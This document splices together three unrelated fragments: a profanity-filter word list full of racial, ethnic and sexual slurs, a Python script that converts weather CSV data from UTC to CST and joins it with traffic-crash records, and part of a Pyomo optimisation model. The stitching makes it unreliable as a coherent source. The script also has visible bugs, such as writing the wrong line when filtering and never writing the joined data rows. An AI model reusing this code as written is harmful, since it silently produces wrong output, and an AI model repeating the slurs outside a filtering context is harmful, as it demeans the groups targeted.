"niggards", "niggard's", "niggaz", "nigger", "niggerhead",
"niggerhole", "niggers", "nigger's", "niggle", "niggled",
"niggles", "niggling", "nigglings", "niggor", "niggur", "niglet",
"nignog", "nigr", "nigra", "nigre", "nip", "nipple", "nipplering",
"nittit", "nlgger", "nlggor", "nofuckingway", "nook", "nookey",
"nookie", "noonan", "nooner", "nude", "nudger", "nuke",
"nutfucker", "nymph", "ontherag", "oral", "orga", "orgasim ",
"orgasm", "orgies", "orgy", "osama", "paki", "palesimian",
"palestinian", "pansies", "pansy", "panti", "panties", "payo",
"pearlnecklace", "peck", "pecker", "peckerwood", "pee", "peehole",
"pee-pee", "peepshow", "peepshpw", "pendy", "penetration", "peni5",
"penile", "penis", "penises", "penthouse", "period", "perv",
"phonesex", "phuk", "phuked", "phuking", "phukked", "phukking",
"phungky", "phuq", "pi55", "picaninny", "piccaninny", "pickaninny",
"piker", "pikey", "piky", "pimp", "pimped", "pimper", "pimpjuic",
"pimpjuice", "pimpsimp", "pindick", "piss", "pissed", "pisser",
"pisses ", "pisshead", "pissin ", "pissing", "pissoff ", "pistol",
"pixie", "pixy", "playboy", "playgirl", "pocha", "pocho",
"pocketpool", "pohm", "polack", "pom", "pommie", "pommy", "poo",
"poon", "poontang", "poop", "pooper", "pooperscooper", "pooping",
"poorwhitetrash", "popimp", "porchmonkey", "porn", "pornflick",
"pornking", "porno", "pornography", "pornprincess", "pot",
"poverty", "premature", "pric", "prick", "prickhead", "primetime",
"propaganda", "pros", "prostitute", "protestant", "pu55i", "pu55y",
"pube", "pubic", "pubiclice", "pud", "pudboy", "pudd", "puddboy",
"puke", "puntang", "purinapricness", "puss", "pussie", "pussies",
"pussy", "pussycat", "pussyeater", "pussyfucker", "pussylicker",
"pussylips", "pussylover", "pussypounder", "pusy", "quashie",
"queef", "queer", "quickie", "quim", "ra8s", "rabbi", "racial",
"racist", "radical", "radicals", "raghead", "randy", "rape",
"raped", "raper", "rapist", "rearend", "rearentry", "rectum",
"redlight", "redneck", "reefer", "reestie", "refugee", "reject",
"remains", "rentafuck", "republican", "rere", "retard", "retarded",
"ribbed", "rigger", "rimjob", "rimming", "roach", "robber",
"roundeye", "rump", "russki", "russkie", "sadis", "sadom",
"samckdaddy", "sandm", "sandnigger", "satan", "scag", "scallywag",
"scat", "schlong", "screw", "screwyou", "scrotum", "scum", "semen",
"seppo", "servant", "sex", "sexed", "sexfarm", "sexhound",
"sexhouse", "sexing", "sexkitten", "sexpot", "sexslave", "sextogo",
"sextoy", "sextoys", "sexual", "sexually", "sexwhore", "sexy",
"sexymoma", "sexy-slim", "shag", "shaggin", "shagging", "shat",
"shav", "shawtypimp", "sheeney", "shhit", "shinola", "shit",
"shitcan", "shitdick", "shite", "shiteater", "shited", "shitface",
"shitfaced", "shitfit", "shitforbrains", "shitfuck", "shitfucker",
"shitfull", "shithapens", "shithappens", "shithead", "shithouse",
"shiting", "shitlist", "shitola", "shitoutofluck", "shits",
"shitstain", "shitted", "shitter", "shitting", "shitty ", "shoot",
| |
import errno
import json
import os
import sys
import zipfile
from datetime import datetime, timezone, timedelta
from dateutil import tz
def main():
[ipDirPath, opDirPath] = getInputOutputFileNames()
# Task 1
aggregateFilesAtDayLevel(ipDirPath=ipDirPath, opDirPath=opDirPath,
# maxFilesToProcess=3,
monthInputSanityCheck=False,
deleteIntermediateFiles=True
)
aggregateFilesAtMonthLevel(ipDirPath=ipDirPath, opDirPath=opDirPath,
# maxFilesToProcess=3,
monthInputSanityCheck=False,
deleteIntermediateFiles=True
)
# Task 2
redistributeCsvFilesForCstDay(opDirPath, removeExistingCsv=False)
redistributeCsvFilesForCstMonth(opDirPath, removeExistingCsv=False)
filterOnGidDayLevel(opDirPath, os.path.join(ipDirPath, '2020', 'gidstatic.csv'));
filterOnGidMonthLevel(opDirPath, os.path.join(ipDirPath, '2020', 'gidstatic.csv'))
# Task 3
joinOFeaturesOnGidAndDateTimePerDay(opDirPath,
os.path.join(ipDirPath, '2020', 'JoinFeatures.csv'),
"gidFilteredFile.csv")
joinOFeaturesOnGidAndDateTimePerMonth(opDirPath,
os.path.join(ipDirPath, '2020', 'JoinFeatures.csv'),
"gidFilteredFile.csv")
def getListOfJoinFeatureRows(joinFeatureFileFullPath):
result = []
mapFeaturesColumns = getAllColumnsMap()
with open(joinFeatureFileFullPath, 'r') as joinFile:
joinFile.readline()
line = joinFile.readline()
while line:
oneRow = []
if ",\"" in line:
oneRow.extend(line.split("\"")[0].split(',')[0:-1])
oneRow.append(line.split("\"")[1])
oneRow.extend(line.split("\"")[2].split(',')[1:])
else:
oneRow = line.split(",")
if len(oneRow) == len(mapFeaturesColumns) - 1:
result.append(oneRow)
line = joinFile.readline()
# print("You may want to fix these rows")
# for row in result:
# if len(row) != 109:
# print (len(row), " ", row)
return result
def mapOfJoinFeatureRowsOfFiveMinIntervals(listOfJoinFeatureRows):
columnMap = getAllColumnsMap()
mapToReturn = {}
for rowData in listOfJoinFeatureRows:
date = rowData[columnMap["CRASH_DATE"]]
timeOfCrash = datetime.strptime(rowData[columnMap["TIMESTR"]], '%H:%M')
timeToSubtract = int(rowData[columnMap["CRASH_TIME"]]) % 5
timeOfCrashAdjusted = timeOfCrash - timedelta(minutes=timeToSubtract)
dateOfCrash = datetime.strptime(date, '%Y%m%d')
crash_time_and_crash_date = dateOfCrash.__str__().split(' ')[0] + 'T' + \
timeOfCrashAdjusted.__str__().split(' ')[1] + 'Z'
rowData.append(crash_time_and_crash_date)
# print(dateOfCrash.__str__().split(' ')[0] + 'T' + timeOfCrashAdjusted.__str__().split(' ')[1] + 'Z')
if crash_time_and_crash_date not in mapToReturn:
mapToReturn[crash_time_and_crash_date] = [rowData]
else:
mapToReturn[crash_time_and_crash_date].append(rowData)
return mapToReturn
def addRowToJoinFile(joinedFilePath, dataRowString):
if not os.path.exists(joinedFilePath):
with open(joinedFilePath, "w") as f:
f.write("gid, tmpc, wawa, ptype, dwpc, smps, drct, vsby, roadtmpc, srad, snwd, pcpn, time_UTC, time_CST, ")
f.write(getAllColumnsMap().keys().__str__())
f.close()
def joinOneFile(cstCsvFile, mapOfJoinFeatureRows, joinedFilePath):
with open(cstCsvFile, 'r') as csv:
csv.readline()
line = csv.readline()
while line:
if line[:-1].split(',')[-1] in mapOfJoinFeatureRows:
dataRowString = line + "," + mapOfJoinFeatureRows[line[-1]].__str__()
addRowToJoinFile(joinedFilePath, dataRowString)
line = csv.readline()
csv.close()
def joinOFeaturesOnGidAndDateTimePerDay(opDirPath, joinFeatureFileFullPath, gidFilteredFileName,
joinedFileName="joinFile.csv"):
listOfJoinFeatureRows = getListOfJoinFeatureRows(joinFeatureFileFullPath)
mapOfJoinFeatureRows = mapOfJoinFeatureRowsOfFiveMinIntervals(listOfJoinFeatureRows)
for year in os.listdir(opDirPath):
if not os.path.isdir(os.path.join(opDirPath, year)):
continue
for month in os.listdir(os.path.join(opDirPath, year)):
if not os.path.isdir(os.path.join(opDirPath, year, month)):
continue
for day in os.listdir(os.path.join(opDirPath, year, month)):
if not os.path.isdir(os.path.join(opDirPath, year, month, day)):
continue
# File that contains aggregated data
cstCsvFile = os.path.join(opDirPath, year, month, day, gidFilteredFileName)
joinedFilePath = os.path.join(opDirPath, year, month, day, joinedFileName)
if os.path.exists(joinedFilePath):
os.remove(joinedFilePath)
joinOneFile(cstCsvFile, mapOfJoinFeatureRows, joinedFilePath)
print("joined ", cstCsvFile, " added to ", joinedFilePath)
def joinOFeaturesOnGidAndDateTimePerMonth(opDirPath, joinFeatureFileFullPath, gidFilteredFileName,
joinedFileName="joinFile.csv"):
listOfJoinFeatureRows = getListOfJoinFeatureRows(joinFeatureFileFullPath)
mapOfJoinFeatureRows = mapOfJoinFeatureRowsOfFiveMinIntervals(listOfJoinFeatureRows)
for year in os.listdir(opDirPath):
if not os.path.isdir(os.path.join(opDirPath, year)):
continue
for month in os.listdir(os.path.join(opDirPath, year)):
if not os.path.isdir(os.path.join(opDirPath, year, month)):
continue
# File that contains aggregated data
cstCsvFile = os.path.join(opDirPath, year, month, gidFilteredFileName)
joinedFilePath = os.path.join(opDirPath, year, month, joinedFileName)
if os.path.exists(joinedFilePath):
os.remove(joinedFilePath)
joinOneFile(cstCsvFile, mapOfJoinFeatureRows, joinedFilePath)
print("joined ", cstCsvFile, " added to ", joinedFilePath)
def appendLineInFile(line, gidPartitionFileFullPath):
if not os.path.exists(gidPartitionFileFullPath):
with open(gidPartitionFileFullPath, "w") as f:
f.write("gid, tmpc, wawa, ptype, dwpc, smps, drct, vsby, roadtmpc, srad, snwd, pcpn, time_UTC, time_CST\n")
f.close()
print("Created filtered file ", gidPartitionFileFullPath)
with open(gidPartitionFileFullPath, "a") as f:
f.write(line)
def getAllColumnsMap():
mapToReturn = {
"OID": 0,
"Join_Count": 1,
"TARGET_FID": 2,
"CRASH_KEY": 3,
"CASENUMBER": 4,
"LECASENUM": 5,
"XCOORD": 6,
"YCOORD": 7,
"REPORTTYPE": 8,
"DOTDSTRCT": 9,
"ISPDSTRCT": 10,
"RPA": 11,
"MPO": 12,
"COUNTY": 13,
"CITYBR": 14,
"URBANAREA": 15,
"CVLTWPID": 16,
"TWNRNGSECT": 17,
"SCHDST1011": 18,
"AEA1011": 19,
"STID1011": 20,
"DNRDSTRCT": 21,
"DNRWLDMGMT": 22,
"DNRWLDDEPR": 23,
"DNRFLDOFF": 24,
"CRASH_YEAR": 25,
"X": 26,
"Y": 27,
"Longitude": 28,
"Latitude": 29,
"FIRSTHARM": 30,
"CRCOMANNER": 31,
"MAJORCAUSE": 32,
"DRUGALCREL": 33,
"ECONTCIRC": 34,
"WEATHER1": 35,
"WEATHER2": 36,
"LIGHT": 37,
"CSURFCOND": 38,
"ZCOORD": 39,
"LANEDIR": 40,
"OVERUNDER": 41,
"LITDESC": 42,
"GIMSDATE": 43,
"LOCTOOLV": 44,
"CAPTURED": 45,
"CRASH_DATE": 46,
"CRASHMONTH": 47,
"DAYOFMONTH": 48,
"CRASH_DAY": 49,
"CRASH_TIME": 50,
"TIMESTR": 51,
"TIMEDAY": 52,
"TIMEBIN": 53,
"TIMEBIN1": 54,
"TIMEBIN30": 55,
"LIGHTING": 56,
"DAYLIGHT": 57,
"DARKNESS": 58,
"LOCFSTHARM": 59,
"RURALURBAN": 60,
"CITY": 61,
"CITYNAME": 62,
"SYSTEM": 63,
"ROUTE": 64,
"SYSTEMSTR": 65,
"CARDINAL": 66,
"RAMP": 67,
"COROADRTE": 68,
"LITERAL": 69,
"ROADCLASS": 70,
"INTCLASS": 71,
"SYSTEMCONC": 72,
"RCONTCIRC": 73,
"ROADTYPE": 74,
"FRA": 75,
"PAVED": 76,
"CSEVERITY": 77,
"FATALITIES": 78,
"INJURIES": 79,
"MAJINJURY": 80,
"MININJURY": 81,
"POSSINJURY": 82,
"UNKINJURY": 83,
"PROPDMG": 84,
"VEHICLES": 85,
"TOCCUPANTS": 86,
"WZ_RELATED": 87,
"WZ_LOC": 88,
"WZ_TYPE": 89,
"WZ_ACTVTY": 90,
"WORKERS": 91,
"gid": 92,
"LL_row": 93,
"LL_col": 94,
"LL_Long": 95,
"LL_Lat": 96,
"LR_row": 97,
"LR_col": 98,
"LR_Long": 99,
"LR_Lat": 100,
"UR_row": 101,
"UR_col": 102,
"UR_Long": 103,
"UR_Lat": 104,
"UL_row": 105,
"UL_col": 106,
"UL_Long": 107,
"UL_Lat": 108,
"crash_time_and_crash_date": 109
}
return mapToReturn
def filterOneFile(cstCsvFile, setOfGidsTOInclude, filteredFileName):
count = 0
includedRows = 0
with open(cstCsvFile, "r") as csv:
csv.readline()
line = csv.readline()
while line:
rowData = line.split(sep=',')
line = csv.readline()
gid = rowData[0]
if gid in setOfGidsTOInclude:
appendLineInFile(line, filteredFileName)
includedRows += 1
count += 1
if count % 100000 == 0:
print("Processed ", count, " rows from file ", cstCsvFile, " : included ", includedRows, " rows")
def filterOnGidMonthLevel(opDirPath, gidFileFullPath, cstCsvFileName="cstAggregated.csv"):
setOfGidToKeep = createSetOfGidFromFile(gidFileFullPath);
for year in os.listdir(opDirPath):
if not os.path.isdir(os.path.join(opDirPath, year)):
continue
for month in os.listdir(os.path.join(opDirPath, year)):
if not os.path.isdir(os.path.join(opDirPath, year, month)):
continue
# File that contains aggregated data
cstCsvFile = os.path.join(opDirPath, year, month, cstCsvFileName)
gidFilteredFilePath = os.path.join(opDirPath, year, month, "gidFilteredFile.csv")
if os.path.exists(gidFilteredFilePath):
os.remove(gidFilteredFilePath)
filterOneFile(cstCsvFile, setOfGidToKeep, gidFilteredFilePath)
print("Filtered ", cstCsvFile, " added to ", gidFilteredFilePath)
def createSetOfGidFromFile(gidFileFullPath):
result = set()
print("Creating set of GIDs used to filter in rows...")
count = 0
with open(gidFileFullPath, "r") as f:
f.readline()
line = f.readline()
while line:
line = f.readline()
result.add(line.split('\n')[0])
count += 1
if count % 10000 == 0:
print("Processed ", count, " rows...")
print("Gid set created with ", count, " entries")
return result
def filterOnGidDayLevel(opDirPath, gidFileFullPath, cstCsvFileName="cstAggregated.csv"):
setOfGidToKeep = createSetOfGidFromFile(gidFileFullPath);
for year in os.listdir(opDirPath):
if not os.path.isdir(os.path.join(opDirPath, year)):
continue
for month in os.listdir(os.path.join(opDirPath, year)):
if not os.path.isdir(os.path.join(opDirPath, year, month)):
continue
for day in os.listdir(os.path.join(opDirPath, year, month)):
if not os.path.isdir(os.path.join(opDirPath, year, month, day)):
continue
# File that contains aggregated data
cstCsvFile = os.path.join(opDirPath, year, month, day, cstCsvFileName)
gidFilteredFilePath = os.path.join(opDirPath, year, month, day, "gidFilteredFile.csv")
if os.path.exists(gidFilteredFilePath):
os.remove(gidFilteredFilePath)
filterOneFile(cstCsvFile, setOfGidToKeep, gidFilteredFilePath)
print("Filtered ", cstCsvFile, " added to ", gidFilteredFilePath)
def putLastDaySlice(lastCsvFile, utcCsvFile):
lines = 0
totalLines = 0
with open(lastCsvFile, "a") as f:
with open(utcCsvFile, "r") as csv:
csv.readline()
line = csv.readline()
while line:
rowData = line.split(sep=',')
line = csv.readline()
utcTime = rowData[12]
cstTime = rowData[13]
if utcTime.split('T')[0] != cstTime.split('T')[0]:
f.write(line)
lines = lines + 1
totalLines = totalLines + 1
if lines >= 100000:
print("Processed ", lines, " from ",
utcCsvFile, " total lines ", totalLines)
lines = 0
csv.close()
f.close()
def putCurrentDaySlice(cstCsvFile, utcCsvFile):
lines = 0
totalLines = 0
with open(cstCsvFile, "a") as f:
with open(utcCsvFile, "r") as csv:
csv.readline()
line = csv.readline()
while line:
rowData = line.split(sep=',')
utcTime = rowData[12]
cstTime = rowData[13]
if utcTime.split('T')[0] == cstTime.split('T')[0]:
f.write(line)
lines = lines + 1
totalLines = totalLines + 1
if lines >= 100000:
print("Processed ", lines, " from ",
utcCsvFile, " total lines ", totalLines)
lines = 0
line = csv.readline()
csv.close()
f.close()
def redistributeCsvFilesForCstDay(opDirPath,
removeExistingCsv=False,
utcCsvFileName="aggregated.csv",
cstCsvFileName="cstAggregated.csv"):
lastCsvFile = None
for year in os.listdir(opDirPath):
if not os.path.isdir(os.path.join(opDirPath, year)):
continue
for month in os.listdir(os.path.join(opDirPath, year)):
if not os.path.isdir(os.path.join(opDirPath, year, month)):
continue
for day in os.listdir(os.path.join(opDirPath, year, month)):
if not os.path.isdir(os.path.join(opDirPath, year, month, day)):
continue
# File that contains aggregated data
utcCsvFile = os.path.join(opDirPath, year, month, day, utcCsvFileName)
cstCsvFile = os.path.join(opDirPath, year, month, day, cstCsvFileName)
if not os.path.exists(cstCsvFile):
with open(cstCsvFile, "w") as f:
f.write(
"gid, tmpc, wawa, ptype, dwpc, smps, drct, vsby, roadtmpc, srad, snwd, pcpn, time_UTC, time_CST\n")
f.close()
if lastCsvFile is not None:
putLastDaySlice(lastCsvFile, utcCsvFile)
print("Done copying out previous day CST to ", lastCsvFile, " from ",
utcCsvFile)
putCurrentDaySlice(cstCsvFile, utcCsvFile)
print("Done copying out current day CST to ", cstCsvFile, " from ",
utcCsvFile)
lastCsvFile = cstCsvFile
def redistributeCsvFilesForCstMonth(opDirPath,
removeExistingCsv=False,
utcCsvFileName="aggregated.csv",
cstCsvFileName="cstAggregated.csv"):
lastCsvFile = None
for year in os.listdir(opDirPath):
if not os.path.isdir(os.path.join(opDirPath, year)):
continue
for month in os.listdir(os.path.join(opDirPath, year)):
if not os.path.isdir(os.path.join(opDirPath, year, month)):
continue
# File that contains aggregated data
utcCsvFile = os.path.join(opDirPath, year, month, utcCsvFileName)
cstCsvFile = os.path.join(opDirPath, year, month, cstCsvFileName)
# for day in os.listdir(os.path.join(opDirPath, year, month)):
# if not os.path.isdir(os.path.join(opDirPath, year, month, day)):
# continue
if not os.path.exists(cstCsvFile):
with open(cstCsvFile, "w") as f:
f.write(
"gid, tmpc, wawa, ptype, dwpc, smps, drct, vsby, roadtmpc, srad, snwd, pcpn, time_UTC, "
"time_CST\n")
f.close()
if lastCsvFile is not None:
putLastDaySlice(lastCsvFile, utcCsvFile)
print("Done copying out previous day CST to ", lastCsvFile, " from ",
utcCsvFile)
| |
initialize=0)
m.x942 = Var(within=Reals, bounds=(0,10), initialize=0)
m.x943 = Var(within=Reals, bounds=(0,10), initialize=0)
m.x944 = Var(within=Reals, bounds=(0,10), initialize=0)
m.x945 = Var(within=Reals, bounds=(0,10), initialize=0)
m.x946 = Var(within=Reals, bounds=(0,10), initialize=0)
m.x947 = Var(within=Reals, bounds=(0,10), initialize=0)
m.x948 = Var(within=Reals, bounds=(0,10), initialize=0)
m.x949 = Var(within=Reals, bounds=(0,10), initialize=0)
m.x950 = Var(within=Reals, bounds=(0,10), initialize=0)
m.x951 = Var(within=Reals, bounds=(0,10), initialize=0)
m.x952 = Var(within=Reals, bounds=(0,10), initialize=0)
m.x953 = Var(within=Reals, bounds=(0,10), initialize=0)
m.x954 = Var(within=Reals, bounds=(0,10), initialize=0)
m.x955 = Var(within=Reals, bounds=(0,10), initialize=0)
m.x956 = Var(within=Reals, bounds=(0,10), initialize=0)
m.x957 = Var(within=Reals, bounds=(0,10), initialize=0)
m.x958 = Var(within=Reals, bounds=(0,10), initialize=0)
m.x959 = Var(within=Reals, bounds=(0,10), initialize=0)
m.x960 = Var(within=Reals, bounds=(0,10), initialize=0)
m.x961 = Var(within=Reals, bounds=(0,10), initialize=0)
m.x962 = Var(within=Reals, bounds=(0,10), initialize=0)
m.x963 = Var(within=Reals, bounds=(0,10), initialize=0)
m.x964 = Var(within=Reals, bounds=(0,10), initialize=0)
m.x965 = Var(within=Reals, bounds=(0,10), initialize=0)
m.x966 = Var(within=Reals, bounds=(0,10), initialize=0)
m.x967 = Var(within=Reals, bounds=(0,10), initialize=0)
m.x968 = Var(within=Reals, bounds=(0,10), initialize=0)
m.x969 = Var(within=Reals, bounds=(0,10), initialize=0)
m.x970 = Var(within=Reals, bounds=(0,10), initialize=0)
m.x971 = Var(within=Reals, bounds=(0,10), initialize=0)
m.x972 = Var(within=Reals, bounds=(0,10), initialize=0)
m.x973 = Var(within=Reals, bounds=(0,10), initialize=0)
m.x974 = Var(within=Reals, bounds=(0,10), initialize=0)
m.x975 = Var(within=Reals, bounds=(0,10), initialize=0)
m.x976 = Var(within=Reals, bounds=(0,10), initialize=0)
m.x977 = Var(within=Reals, bounds=(0,10), initialize=0)
m.x978 = Var(within=Reals, bounds=(0,10), initialize=0)
m.x979 = Var(within=Reals, bounds=(0,10), initialize=0)
m.x980 = Var(within=Reals, bounds=(0,10), initialize=0)
m.x981 = Var(within=Reals, bounds=(0,10), initialize=0)
m.x982 = Var(within=Reals, bounds=(0,10), initialize=0)
m.x983 = Var(within=Reals, bounds=(0,10), initialize=0)
m.x984 = Var(within=Reals, bounds=(0,10), initialize=0)
m.x985 = Var(within=Reals, bounds=(0,10), initialize=0)
m.x986 = Var(within=Reals, bounds=(0,10), initialize=0)
m.x987 = Var(within=Reals, bounds=(0,10), initialize=0)
m.x988 = Var(within=Reals, bounds=(0,10), initialize=0)
m.x989 = Var(within=Reals, bounds=(0,10), initialize=0)
m.x990 = Var(within=Reals, bounds=(0,10), initialize=0)
m.x991 = Var(within=Reals, bounds=(0,10), initialize=0)
m.x992 = Var(within=Reals, bounds=(0,10), initialize=0)
m.x993 = Var(within=Reals, bounds=(0,10), initialize=0)
m.x994 = Var(within=Reals, bounds=(0,10), initialize=0)
m.x995 = Var(within=Reals, bounds=(0,10), initialize=0)
m.x996 = Var(within=Reals, bounds=(0,10), initialize=0)
m.x997 = Var(within=Reals, bounds=(0,10), initialize=0)
m.x998 = Var(within=Reals, bounds=(0,10), initialize=0)
m.x999 = Var(within=Reals, bounds=(0,10), initialize=0)
m.x1000 = Var(within=Reals, bounds=(0,10), initialize=0)
m.x1001 = Var(within=Reals, bounds=(0,10), initialize=0)
m.x1002 = Var(within=Reals, bounds=(0,10), initialize=0)
m.x1003 = Var(within=Reals, bounds=(0,10), initialize=0)
m.x1004 = Var(within=Reals, bounds=(0,10), initialize=0)
m.x1005 = Var(within=Reals, bounds=(0,10), initialize=0)
m.x1006 = Var(within=Reals, bounds=(0,10), initialize=0)
m.x1007 = Var(within=Reals, bounds=(0,10), initialize=0)
m.x1008 = Var(within=Reals, bounds=(0,10), initialize=0)
m.x1009 = Var(within=Reals, bounds=(0,10), initialize=0)
m.x1010 = Var(within=Reals, bounds=(0,10), initialize=0)
m.x1011 = Var(within=Reals, bounds=(0,10), initialize=0)
m.x1012 = Var(within=Reals, bounds=(0,10), initialize=0)
m.x1013 = Var(within=Reals, bounds=(0,10), initialize=0)
m.x1014 = Var(within=Reals, bounds=(0,10), initialize=0)
m.x1015 = Var(within=Reals, bounds=(0,10), initialize=0)
m.x1016 = Var(within=Reals, bounds=(0,10), initialize=0)
m.x1017 = Var(within=Reals, bounds=(0,10), initialize=0)
m.x1018 = Var(within=Reals, bounds=(0,10), initialize=0)
m.x1019 = Var(within=Reals, bounds=(0,10), initialize=0)
m.x1020 = Var(within=Reals, bounds=(0,10), initialize=0)
m.x1021 = Var(within=Reals, bounds=(0,10), initialize=0)
m.x1022 = Var(within=Reals, bounds=(0,10), initialize=0)
m.x1023 = Var(within=Reals, bounds=(0,10), initialize=0)
m.x1024 = Var(within=Reals, bounds=(0,10), initialize=0)
m.x1025 = Var(within=Reals, bounds=(0,10), initialize=0)
m.x1026 = Var(within=Reals, bounds=(0,10), initialize=0)
m.x1027 = Var(within=Reals, bounds=(0,10), initialize=0)
m.x1028 = Var(within=Reals, bounds=(0,10), initialize=0)
m.x1029 = Var(within=Reals, bounds=(0,10), initialize=0)
m.x1030 = Var(within=Reals, bounds=(0,10), initialize=0)
m.x1031 = Var(within=Reals, bounds=(0,10), initialize=0)
m.x1032 = Var(within=Reals, bounds=(0,10), initialize=0)
m.x1033 = Var(within=Reals, bounds=(0,10), initialize=0)
m.x1034 = Var(within=Reals, bounds=(0,10), initialize=0)
m.x1035 = Var(within=Reals, bounds=(0,10), initialize=0)
m.x1036 = Var(within=Reals, bounds=(0,10), initialize=0)
m.x1037 = Var(within=Reals, bounds=(0,10), initialize=0)
m.x1038 = Var(within=Reals, bounds=(0,10), initialize=0)
m.x1039 = Var(within=Reals, bounds=(0,10), initialize=0)
m.x1040 = Var(within=Reals, bounds=(0,10), initialize=0)
m.x1041 = Var(within=Reals, bounds=(0,10), initialize=0)
m.x1042 = Var(within=Reals, bounds=(0,10), initialize=0)
m.x1043 = Var(within=Reals, bounds=(0,10), initialize=0)
m.x1044 = Var(within=Reals, bounds=(0,10), initialize=0)
m.x1045 = Var(within=Reals, bounds=(0,10), initialize=0)
m.x1046 = Var(within=Reals, bounds=(0,10), initialize=0)
m.x1047 = Var(within=Reals, bounds=(0,10), initialize=0)
m.x1048 = Var(within=Reals, bounds=(0,10), initialize=0)
m.x1049 = Var(within=Reals, bounds=(0,10), initialize=0)
m.x1050 = Var(within=Reals, bounds=(0,10), initialize=0)
m.x1051 = Var(within=Reals, bounds=(0,10), initialize=0)
m.x1052 = Var(within=Reals, bounds=(0,10), initialize=0)
m.x1053 = Var(within=Reals, bounds=(0,10), initialize=0)
m.x1054 = Var(within=Reals, bounds=(0,10), initialize=0)
m.x1055 = Var(within=Reals, bounds=(0,10), initialize=0)
m.x1056 = Var(within=Reals, bounds=(0,10), initialize=0)
m.x1057 = Var(within=Reals, bounds=(0,10), initialize=0)
m.x1058 = Var(within=Reals, bounds=(0,10), initialize=0)
m.x1059 = Var(within=Reals, bounds=(0,10), initialize=0)
m.x1060 = Var(within=Reals, bounds=(0,10), initialize=0)
m.obj = Objective(sense=minimize, expr= m.x203 + m.x206 + m.x209 + m.x212 +
m.x214 + m.x216 + m.x218 + m.x220 + m.x222 + m.x224 + m.x226 + m.x228 +
m.x230 + m.x232 + m.x234 + m.x236 + m.x237 + m.x238 + m.x239 + m.x240 +
m.x241 + m.x242 + m.x243 + m.x244 + m.x245 + m.x246 + m.x247 + m.x248 +
m.x249 + m.x250 + m.x251 + m.x252 + m.x253 + m.x254 + m.x255 + m.x256 +
m.x257 + m.x258 + m.x259 + m.x260)
m.e1 = Constraint(expr= m.x201 - m.x202 - m.x203 <= 0)
m.e2 = Constraint(expr= -m.x201 + m.x202 - m.x203 <= 0)
m.e3 = Constraint(expr= m.x204 - m.x205 - m.x206 <= 0)
m.e4 = Constraint(expr= -m.x204 + m.x205 - m.x206 <= 0)
m.e5 = Constraint(expr= m.x207 - m.x208 - m.x209 <= 0)
m.e6 = Constraint(expr= -m.x207 + m.x208 - m.x209 <= 0)
m.e7 = Constraint(expr= m.x210 - m.x211 - m.x212 <= 0)
m.e8 = Constraint(expr= -m.x210 + m.x211 - m.x212 <= 0)
m.e9 = Constraint(expr= m.x201 - m.x213 - m.x214 <= 0)
m.e10 = Constraint(expr= -m.x201 + m.x213 - m.x214 <= 0)
m.e11 = Constraint(expr= m.x204 - m.x215 - m.x216 <= 0)
m.e12 = Constraint(expr= -m.x204 + m.x215 - m.x216 <= 0)
m.e13 = Constraint(expr= m.x207 - m.x217 - m.x218 <= 0)
m.e14 = Constraint(expr= -m.x207 + m.x217 - m.x218 <= 0)
m.e15 = Constraint(expr= m.x210 - m.x219 - m.x220 <= 0)
m.e16 = Constraint(expr= -m.x210 + m.x219 - m.x220 <= 0)
m.e17 = Constraint(expr= m.x201 - m.x221 - m.x222 <= 0)
m.e18 = Constraint(expr= -m.x201 + m.x221 - m.x222 <= 0)
m.e19 = Constraint(expr= m.x204 - m.x223 - m.x224 <= 0)
m.e20 = Constraint(expr= -m.x204 + m.x223 - m.x224 <= 0)
m.e21 = Constraint(expr= m.x207 - m.x225 - m.x226 <= 0)
m.e22 = Constraint(expr= -m.x207 + m.x225 - m.x226 <= 0)
m.e23 = Constraint(expr= m.x210 - m.x227 - m.x228 <= 0)
m.e24 = Constraint(expr= -m.x210 + m.x227 - m.x228 <= 0)
m.e25 = Constraint(expr= m.x201 - m.x229 - m.x230 <= 0)
m.e26 = Constraint(expr= -m.x201 + m.x229 - m.x230 <= 0)
m.e27 = Constraint(expr= m.x204 - m.x231 - m.x232 <= 0)
m.e28 = Constraint(expr= -m.x204 + m.x231 - m.x232 <= 0)
m.e29 = Constraint(expr= m.x207 - m.x233 - m.x234 <= 0)
m.e30 = Constraint(expr= -m.x207 + m.x233 - m.x234 <= 0)
m.e31 = Constraint(expr= m.x210 - m.x235 - m.x236 <= 0)
m.e32 = Constraint(expr= -m.x210 + m.x235 - m.x236 <= 0)
m.e33 = Constraint(expr= m.x202 - m.x213 - m.x237 <= 0)
m.e34 = Constraint(expr= -m.x202 + m.x213 - m.x237 <= 0)
m.e35 = Constraint(expr= m.x205 - m.x215 - m.x238 <= 0)
m.e36 = Constraint(expr= -m.x205 + m.x215 - m.x238 <= 0)
m.e37 = Constraint(expr= m.x208 - m.x217 - m.x239 <= 0)
m.e38 = Constraint(expr= -m.x208 + m.x217 - m.x239 <= 0)
m.e39 = Constraint(expr= m.x211 - m.x219 - m.x240 <= 0)
m.e40 = Constraint(expr= -m.x211 + m.x219 - m.x240 <= 0)
m.e41 = Constraint(expr= m.x202 - m.x221 - m.x241 <= 0)
m.e42 = Constraint(expr= -m.x202 + m.x221 - m.x241 <= 0)
m.e43 = Constraint(expr= m.x205 - m.x223 - m.x242 <= 0)
m.e44 = Constraint(expr= -m.x205 + m.x223 - m.x242 <= 0)
m.e45 = Constraint(expr= m.x208 - m.x225 - m.x243 <= 0)
m.e46 = Constraint(expr= -m.x208 + m.x225 - m.x243 <= 0)
m.e47 = Constraint(expr= m.x211 - m.x227 - m.x244 <= 0)
m.e48 = Constraint(expr= -m.x211 + m.x227 - m.x244 <= 0)
m.e49 = Constraint(expr= m.x202 - m.x229 - m.x245 <= 0)
m.e50 = Constraint(expr= -m.x202 + m.x229 - m.x245 <= 0)
m.e51 = Constraint(expr= m.x205 - m.x231 - m.x246 <= 0)
m.e52 = Constraint(expr= -m.x205 + m.x231 - m.x246 <= 0)
m.e53 = Constraint(expr= m.x208 - m.x233 - m.x247 <= 0)
m.e54 = Constraint(expr= -m.x208 + m.x233 - m.x247 <= 0)
m.e55 = Constraint(expr= m.x211 - m.x235 - m.x248 <= 0)
m.e56 = Constraint(expr= -m.x211 + m.x235 - m.x248 <= 0)
m.e57 = Constraint(expr= m.x213 - m.x221 - m.x249 <= 0)
m.e58 = Constraint(expr= -m.x213 + m.x221 - m.x249 <= 0)
m.e59 = Constraint(expr= m.x215 - m.x223 - m.x250 <= 0)
m.e60 = Constraint(expr= -m.x215 + m.x223 - m.x250 <= 0)
m.e61 = Constraint(expr= m.x217 - m.x225 - m.x251 <= 0)
m.e62 = Constraint(expr= -m.x217 + m.x225 - m.x251 <= 0)
